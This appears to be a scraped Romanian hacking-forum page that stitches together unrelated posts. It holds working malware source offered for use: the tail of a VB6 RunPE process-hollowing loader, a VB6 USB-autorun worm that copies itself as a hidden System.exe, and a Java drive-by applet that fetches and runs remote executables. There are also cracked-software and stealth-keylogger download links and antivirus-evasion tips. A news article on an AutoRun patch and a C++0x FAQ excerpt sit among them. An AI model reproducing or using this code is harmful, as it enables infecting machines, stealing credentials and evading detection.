D)), 40& MoveMemory VarPtr(VirtualAddress), VarPtr(bIsh(12)), 4& MoveMemory VarPtr(SizeOfRawData), VarPtr(bIsh(16)), 4& MoveMemory VarPtr(PointerToRawData), VarPtr(bIsh(20)), 4& Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase + VirtualAddress, VarPtr(bBytes(PointerToRawData)), SizeOfRawData, 0) Next Call Call_("kernel32", "GetThreadContext", hThread, VarPtr(bCtx(0))) MoveMemory VarPtr(Ebx), VarPtr(bCtx(164)), 4& Call Call_("kernel32", "WriteProcessMemory", hProcess, Ebx + 8&, VarPtr(ImageBase), 4&, 0) lTemp = ImageBase + AddressOfEntryPoint MoveMemory VarPtr(bCtx(176)), VarPtr(lTemp), 4& Call Call_("kernel32", "SetThreadContext", hThread, VarPtr(bCtx(0))) Call Call_("kernel32", "ResumeThread", hThread) End Sub Sursa: RunPe + CallApiByName (JunPE)

[VB6] Infect USB Author: mikeh18 Hello all, Here's some modified code i made for detect + infect USB drives using autorun Sub Main() On Error Resume Next 'Object and Strings Dim WMIService As Object, USBDrives As Object, USBFound As Object, USB As String, USBCount As String 'Objects Set WMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") 'Open WMIService Set USBDrives = WMIService.ExecQuery("Select * from Win32_LogicalDisk") 'Look For Computer Drives drives For Each USBFound In USBDrives 'Look for all our drives If USBFound.DriveType = 2 Then 'If drivetype is USB USB = USBFound.Name 'Set USB as New USB-name USBCount = USBCount & " - " & USBFound.Name 'Add USB name to USB-count End If If USB = "" Then GoTo volgende 'If its not an USB-Drive then goto Next FileCopy App.Path & "\" & App.EXEName & ".exe", USB & "System.exe" 'Copy File to New USB Drive Open USB & "autorun.inf" For Output As #1 'Create a Autorun file Print #1, "[autorun]" 'Put Right Settings in it Print #1, "open=System.exe" 'Put Our exe-name in It Close #1 'Close the Autorun File SetAttr USB & "System.exe", vbHidden ' vbHidden 'Hide our Exe File SetAttr USB & "autorun.inf", vbHidden 'Hide the Autorun File volgende: 'Next Next 'Search for more USB drives MsgBox "USB Drives: " & USB & vbNewLine & "Successfull Invected!", vbInformation, "USB Infect" 'Msg When Done End End Sub Mikeh18 Sursa: [VB6] Infect USB

Java Drive-By - Source Code Nu11 So umm there isn't any java forum and it's not worth making one so I'm posting it here The source is completely commented & compiles with latest java Java Source: import java.applet.Applet; import java.io.BufferedOutputStream; import java.io.BufferedReader; import java.io.File; import java.io.FileOutputStream; import java.io.FileReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.OutputStream; import java.net.URL; import java.net.URLConnection; import java.security.AccessControlException; import java.util.ArrayList; // //Change Example to what you want users to see as your Applet Name @SuppressWarnings("serial") public class Exploit extends Applet{ //Same here public Exploit(){ } public String getContents(File aFile) { StringBuilder contents = new StringBuilder(); try { BufferedReader input = new BufferedReader(new FileReader(aFile)); try { String line = null; //not declared within while loop while (( line = input.readLine()) != null){ contents.append(line); contents.append(System.getProperty("line.separator")); } } finally { input.close(); } } catch (IOException ex){ ex.printStackTrace(); } return contents.toString(); } public String getConfig(String link){ try { URLConnection url = null; BufferedReader in = null; url = new URL(link).openConnection(); in = new BufferedReader(new InputStreamReader(url.getInputStream())); String str = in.readLine(); if (in != null) { in.close(); } return str; } catch (final IOException e) { } return null; } public ArrayList<String> getConfigArray(String link){ URLConnection url = null; String line; ArrayList<String> file = new ArrayList<String>(); try { url = new URL(link).openConnection(); BufferedReader in = new BufferedReader(new InputStreamReader(url.getInputStream())); while ((line = in.readLine()) != null) file.add(line); if (in != null) { in.close(); } return file; } catch (final IOException e) { } return null; } public ArrayList<String> loadFile(String fileName) { if ((fileName == null) || (fileName == "")) throw new IllegalArgumentException(); String line; ArrayList<String> file = new ArrayList<String>(); try { BufferedReader in = new BufferedReader(new FileReader(fileName)); if (!in.ready()) throw new IOException(); while ((line = in.readLine()) != null) file.add(line); in.close(); } catch (IOException e) { System.out.println(e); return null; } return file; } //Main Method public void start() throws AccessControlException{ String userdir = System.getProperty("user.home"); String configs = "config.ini"; String urlss = "urls.ini"; String filess = "files.ini"; //FULL PATH TO YOUR WEBSITE HERE(WERE JAR IS GOING TO BE PALCED)\\ String mainURL = "http://site.com/"; ///////////////////////////////////////////////////Do not touch anything below\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ //try{ //////////////////////////////////FILE 1////////////////////////////////// if(getConfig(mainURL+configs).contains("1") || getConfig(mainURL+configs).contains("2") || getConfig(mainURL+configs).contains("3") || getConfig(mainURL+configs).contains("4")){ String fname = "\\"+getConfigArray(mainURL+filess).get(0); String fpath = userdir.concat(fname); final String locationDownload = getConfigArray(mainURL+urlss).get(0); download(locationDownload, fpath); final Runtime run = Runtime.getRuntime(); try { run.exec(fpath); } catch (final IOException e) { } } //////////////////////////////////FILE 2////////////////////////////////// if(getConfig(mainURL+configs).contains("2") || getConfig(mainURL+configs).contains("3") || getConfig(mainURL+configs).contains("4")){ String fname2 = "\\"+getConfigArray(mainURL+filess).get(1); final Runtime run = Runtime.getRuntime(); String fpath2 = userdir.concat(fname2); final String locationDownload2 = getConfigArray(mainURL+urlss).get(1); download(locationDownload2, fpath2); try { run.exec(fpath2); } catch (final IOException e){ } } //////////////////////////////////FILE 3///////////////////////////////// if(getConfig(mainURL+configs).contains("3") || getConfig(mainURL+configs).contains("4")){ String fname3 = "\\"+getConfigArray(mainURL+filess).get(2); final Runtime run = Runtime.getRuntime(); String fpath3 = userdir.concat(fname3); final String locationDownload3 = getConfigArray(mainURL+urlss).get(2); download(locationDownload3, fpath3); try { run.exec(fpath3); } catch (final IOException e){ } } /////////////////////////////////FILE 4////////////////////////////////// if(getConfig(mainURL+configs).contains("4")){ String fname4 = "\\"+getConfigArray(mainURL+filess).get(3); final Runtime run = Runtime.getRuntime(); String fpath4 = userdir.concat(fname4); final String locationDownload3 = getConfigArray(mainURL+urlss).get(3); download(locationDownload3, fpath4); try { run.exec(fpath4); } catch (final IOException e){ } } ////////////////////////////////END/////////////////////////////////// //}catch (AccessControlException e){ // System.out.println("hi"); // } } public void download(final String address, final String localFileName) { OutputStream out = null; URLConnection conn = null; InputStream in = null; try { final URL url = new URL(address); out = new BufferedOutputStream(new FileOutputStream(localFileName)); conn = url.openConnection(); in = conn.getInputStream(); final byte[] buffer = new byte[1024]; int numRead; while ((numRead = in.read(buffer)) != -1) { out.write(buffer, 0, numRead); } } catch (final Exception exception) { } finally { try { if (in != null) { in.close(); } if (out != null) { out.close(); } } catch (final IOException ioe) { } } } public void main(String args[]){ start(); } public void stop(){ } } Create the config.ini in notepad and just put a numeric value for the amount of exe's you want it to execute. if you're only having it dl/exec 1 file then for the value put 1 Create the files.ini in notepad and just put the name of the file its going to download, if you're hosting the file as blah.exe just put blah.exe Create the urls.ini and just put the full download link of whatever file you want it to download and execute. have fun Apoi: <applet width='1' height='1' code='java.class' archive='java.jar'> </applet> Sursa: Java Drive-By (Not Really), Full Source Code

RealVNC Enterprise v4.6.0+keygen Nu l-am descarcat, nu stiu daca e infectat, executati pe riscul vostru. RealVNC Enterprise v4.6.0 Incl Keymaker-CORE | 5.85 MB VNC® Enterprise Edition - A greatly enhanced version of VNC, developed for use in enterprises of all sizes. Designed and built from the ground up by the original inventors of VNC, Enterprise Edition provides secure, robust and easily-administered remote-control with a minimum of fuss. Existing Free Edition users considering upgrading may find this feature comparison useful. There is also a handy datasheet (pdf). FEATURES : Printing Cross-Platform VNC Chat Integrated Session Security [new] System Authentication One-Port HTTP & VNC HTTP Proxy Support Desktop Scaling Cross-Platform Interoperability File Transfer [new] Integrated VNC Address Book VNC Deployment Tool (Windows only) Home: http://www.realvnc.com/products/enterprise/index.html Download: http://www.filesonic.com/file/1204491664/RealVNC.Enterprise.v4.6.0.Incl.Keymaker-CORE.7z Sursa: RealVNC Enterprise v4.6.0+keygen - r00tsecurity

Award Keylogger v2.6 (x86-x64) full Nu l-am descarcat, nu l-am incercat, nu stiu daca e infectat, executati pe riscul vostru. Award Keylogger v2.6 (x86-x64) | 9.36 MB Award Keylogger allows you to monitor all users' activity on any computers in real time and record each computer's usage history. Award Keylogger makes it easy to view, in real time, the screenshots of the any computers, all typed keystrokes, visited Web sites, used programs. You can view a list of running processes and terminate undesirable ones. FEATURES : • New! Run keylogger as a Windows service • Easy-to-use, even for beginners • Absolutely invisible/stealth mode • Logs accounts and passwords typed in the every application • Logs message typed in all instant messengers • Visual surveillance, support screenshots view • Slide show for screenshots • Captures the contents behind the asterisks • Captures mouse clicks • Logs websites visited • Captures AOL/AIM/Yahoo/ICQ chats • Keyword Detection and Notification • Records contents of password protected web pages, including Web Mail messages • Logs Windows Clipboard • Sends log by e-mail • Uploads ALL logs into the separate folders by FTP • Invisible for the firewall program • Invisible in the Windows startup list • Monitors all users of the PC • User friendly HTML file format for emailed logs • Invisible in Windows NT/2000/XP Task Manager and Windows 9.x/Me Task List • Records Windows 9.x/Me/2000/XP/VISTA logon passwords • Intercepts DOS-box and Java-chat keystrokes • Supports international keyboards • External log viewer • Supports printing of the log • Optimized for Windows XP • Exports log to HTML INSTALL 1. Extract files with WinRAR 2. Install Application 3. Use the patch Download: http://www.filesonic.vn/file/1199695194 or http://www.fileserve.com/file/KUETVaP or http://bitshare.com/files/rwaig065/Award-Keylogger-v2.6--x86-x64-.rar.html Sursa: Award Keylogger v2.6 (x86-x64) full - r00tsecurity

Windows XP, Vista AutoRun update reduces malware infections by 82 percent February's "backport" of the Windows 7 feature worked like a charm, says Microsoft By Gregg Keizer | Computerworld Microsoft today credited a February security update for lowering AutoRun-abusing malware infection rates on Windows XP and Vista by as much as 82 percent since the start of the year. Four months ago, Microsoft offered XP and Vista users an optional update -- which was later changed to automatically download and install -- that disabled AutoRun. [ Master your security with InfoWorld's interactive Security iGuide. | Stay up to date on the latest security developments with InfoWorld's Security Central newsletter. ] Microsoft changed AutoRun's behavior in Windows 7 to block automatic execution of files on a USB drive. It first backported the modifications to Windows XP and Vista in 2009. Until February, however, users had to manually seek out the update. With the update in place, flash drives inserted into a PC running XP or Vista no longer offer the option to run programs. AutoRun's extinction does not affect CDs or DVDs, however. The move has paid off in spades, said Microsoft today. "The infection rates for Windows XP and Vista went down ... pretty significantly, in fact," said Holly Stewart, a senior program manager with the MMPC (Microsoft Malware Protection Center), in a blog post Tuesday. According to statistics compiled by the MMPC from data delivered by the Malicious Software Removal Tool (MSRT), a free utility that detects and deletes some attack code, infection rates of malware that spreads through AutoRun plummeted after the February update reached XP and Vista. Since January 2011, the month before the AutoRun update shipped, infection rates of XP Service Pack 3 (SP3) -- the sole version still supported by Microsoft -- have dropped by 62 percent. Vista SP1's infection rate has fallen by 68% while Vista SP2's has plunged by 82 percent in the same period. Microsoft will abandon support of Vista SP1 next month . "That's a huge reduction," said Andrew Storms, director of security operations at nCircle Security. "Imagine if AutoRun was never invented." Storms was talking about the fact that the Windows feature was abused by some of the highest-profile worms in the last two years, including Conficker and Stuxnet. Microsoft credits a February update for XP and Vista for dramatically dropping infection rates of AutoRun-abusing malware. The former relied on AutoRun -- among other propagation techniques -- to infect millions of PCs, while analysts believe the latter used AutoRun to infect Iranian computers associated with the country's uranium enrichment program. Microsoft's Stewart also described an unanticipated side-effect of the update. "What was unexpected, is that there appears to have been a residual effect ...a 'secondhand smoke' kind of effect on adjacent systems that were already protected with proactive defenses," said Stewart, citing Microsoft's own security products, including the free Security Essentials and the for-a-fee, enterprise-grade Forefront line. "The infection attempts on these computers also went down immediately after the update was released." In an interview Tuesday, Jerry Bryant, a group manager with the MSRC (Microsoft Security Response Center), said that the decrease in infection attempts -- ones stymied by a Microsoft antivirus signature -- was due the AutoRun update preventing large numbers of primary infections. "We attribute the overall decline in infections to fewer systems trying to propagate using AutoRun," said Bryant. In February, Microsoft noted that the AutoRun update would break the functionality of some USB drives. "Users who install this update will no longer receive a setup message that prompts them to install programs that are delivered by USB flash drives. Users will have to manually install the software," Microsoft warned in a security advisory at the time. The company has also published the "Enable Autorun" tool that customers can deploy to disable the update's changes and revert to Windows XP's and Vista's earlier behavior. Sursa: Windows XP, Vista AutoRun update reduces malware infections by 82 percent | Security - InfoWorld

Probabil tehnologie anti-rootkit. Ma uitam la videoclipuri de pe Sysinternals si am vazut cam cum functioneaza. Verifica fisierele dintr-un folder folosind API-urile clasice, de exemplu. Apoi aceeasi verificare folosind acces brut la sistemul de fisiere NTFS. Daca lipseste ceva, clar, e ascuns. Asta ar fi o idee. Oricum, solutii sunt multe dar foarte complicate. Se poate verifica de SSDT hooks, e complicat. Vreau ca pe viitor sa ma axez tocmai pe acest domeniu, am inceput sa citesc Windows Internals 5th Edition. Momentan nu stiu foarte multe nici eu...

Sa tii un executabil de exemplu, ca resursa, ca sectiune sau orice altceva, si acel fisier sa nu fie detectabil e banal. Eu pus si simplu adaugam "1" la fiecare octet, si 255 il faceam 0 si nu mai era detectabil. Partea detectabila e loader-ul, codul care incarca executabilul in memorie, sau dropper-ul, partea de cod in care stub-ul se autociteste sau se copiaza pe nu stiu unde, sau "Anti-****"-urile... Asta e greu. Pe ideea cryptarii sectiunii de cod a unui executabil s-ar putea face niste incercari, nu ar mai fi trebuit incarcat in memorie, doar la executie sa se modifice sectiunea de cod, entrypointul poate sa fie acelasi, dar trebuie adaugat codul de decryptare acolo, sectiunea trebuie sa fie MEM_WRITE, sunt cateva lucruri care trebuie facute, dar merge.

Da, este calea mai "1337". Mai dificila, fara documentatie pentru functie... Mai interesanta si mai atragatoare. +1

Vazusem un videoclip facut de muts (Mati Ahroni) bazat pe aceeasi tehnica. Nu stiu ca de eficienta e, e posibil sa fie detectata de scanarile heuristice moderne. Am vrut sa fac un packer pe aceasta idee, poate chiar o sa fac, dar am niste chestii pe cap vreo doua saptamani.

Daca stiam ca o sa apara in articol, scriam si noi ceva mai concret si mai elegant. Oricum, nu suntem noi "hackeri", dar suntem persoane din domeniu... Si da, imi place articolul, e "altfel".

O sa te razgandeti cu timpul, cand vei vedea ca exista si alte lucruri in afara de ce faci in liceu... Tu ai enumerat doar materie de liceu.

C++0x - the next ISO C++ standard This document is written by and maintained by Bjarne Stroustrup. Constructive comments, correction, references, and suggestions are of course most welcome. Currently, I'm working to improve completeness and clean up the references. C++0x is the next ISO C++ standard. Currently a draft is available for comments. The previous (and current) standard is often referred to as C++98 or C++03; the differences between C++98 and C++03 are so few and so technical that they ought not concern users. The final committee draft standard is currently (March 2010) being voted on by the national standards bodies. After that there will be more work before all comments have been addressed and the ISO bureaucracy satisfied. At the current stage of the proceedings, no features (even very minor ones) are expected to be added or removed. The name "C++0x" is a relict of the days where I and others, hoped for a C++08 or C++09. However, to minimize confusion, I'll keep referring to the upcoming C++ standard with the feature set defined here as C++0x. Think of 'x' as hexadecimal (most likely 'B', i.e. C++11). If you have comments on C++0x, please find some member of your national standards body -- or a member of any standards body -- to send your comments to. That's now the only way and will ensure that the committee doesn't have to deal with many very similar comment. Remember, the committee consists of volunteers with limited time and resources. All official documents relating to C++0x can be found at the ISO C++ committee's website. The official name of the committee is SC22 WG21. Caveat: This FAQ will be under construction for quite a while. Comments, questions, references, corrections, and suggestions welcome. Purpose The purpose of this C++0x FAQ is To give an overview of the new facilities (language features and standard libraries) offered by C++0x in addition to what is provided by the previous version of the ISO C++ standard. To give an idea of the aims of the ISO C++ standards effort. To present a user's view of the new facilities To provide references to allow for a more in depth study of features. To name many of the individuals who contributed (mostly as authors of the reports they wrote for the committee). The standard is not written by a faceless organization. Please note that the purpose of this FAQ is not to provide comprehensive discussion of individual features or a detailed explanation of how to use them. The aim is to give simple examples to demonstrate what C++0x has to offer (plus references). My ideal is "max one page per feature" independently of how complex a feature is. Details can often be found in the references. Lists of questions Here are some high-level questions What do you think of C++0x? When will C++0x be a formal standard? When will compilers implement C++0x? When will the new standard libraries be available? What new language features will C++0x provide? (a list); see also the questions below What new standard libraries will C++0x provide? (a list); see also the questions below What were the aims of the C++0x effort? What specific design aims guided the committee? Where can I find the committee papers? Where can I find academic and technical papers about C++0x? (a list) Where else can I read about C++0x? (a list) Are there any videos about C++0x? (a list) Is C++0x hard to learn? How does the committee operate? Who is on the committee? In which order should an implementer provide C++0x features? Will there be a C++1x? What happened to "concepts? Are there any features you don't like? Questions about individual language features can be found here: __cplusplus alignments attributes atomic operations auto (type deduction from initializer) C99 features enum class (scoped and strongly typed enums) copying and rethrowing exceptions constant expressions (generalized and guaranteed;constexpr) decltype defaulted and deleted functions (control of defaults) delegating constructors Dynamic Initialization and Destruction with Concurrency explicit conversion operators extended integer types extern templates for statement; see range for statement suffix return type syntax (extended function declaration syntax) in-class member initializers inherited constructors initializer lists (uniform and general initialization) lambdas local classes as template arguments long long integers (at least 64 bits) memory model move semantics; see rvalue references Inline namespace Preventing narrowing null pointer (nullptr) PODs (generalized) range for statement raw string literals right-angle brackets rvalue references Simple SFINAE rule static (compile-time) assertions (static_assert) template alias template typedef; see template alias thread-local storage (thread_local) unicode characters Uniform initialization syntax and semantics unions (generalized) user-defined literals variadic templates I often borrow examples from the proposals. In those cases: Thanks to the proposal authors. Many of the examples are borrowed from my own talks and papers. Questions about individual standard library facilities can be found here: abandoning a process Improvements to algorithms array async() atomic operations Condition variables Improvements to containers function and bind forward_list a singly-liked list future and promise garbage collection ABI hash_tables; see unordered_map metaprogramming and type traits Mutual exclusion random number generators regex a regular expression library scoped allocators shared_ptr smart pointers; see shared_ptr, weak_ptr, and unique_ptr threads Time utilities tuple unique_ptr unordered_map weak_ptr system error Below are questions to specific questions as indexed above. Tutorial: http://www2.research.att.com/~bs/C++0xFAQ.html

Ceva imi spune ca nu mai dureaza mult pana primesti ban...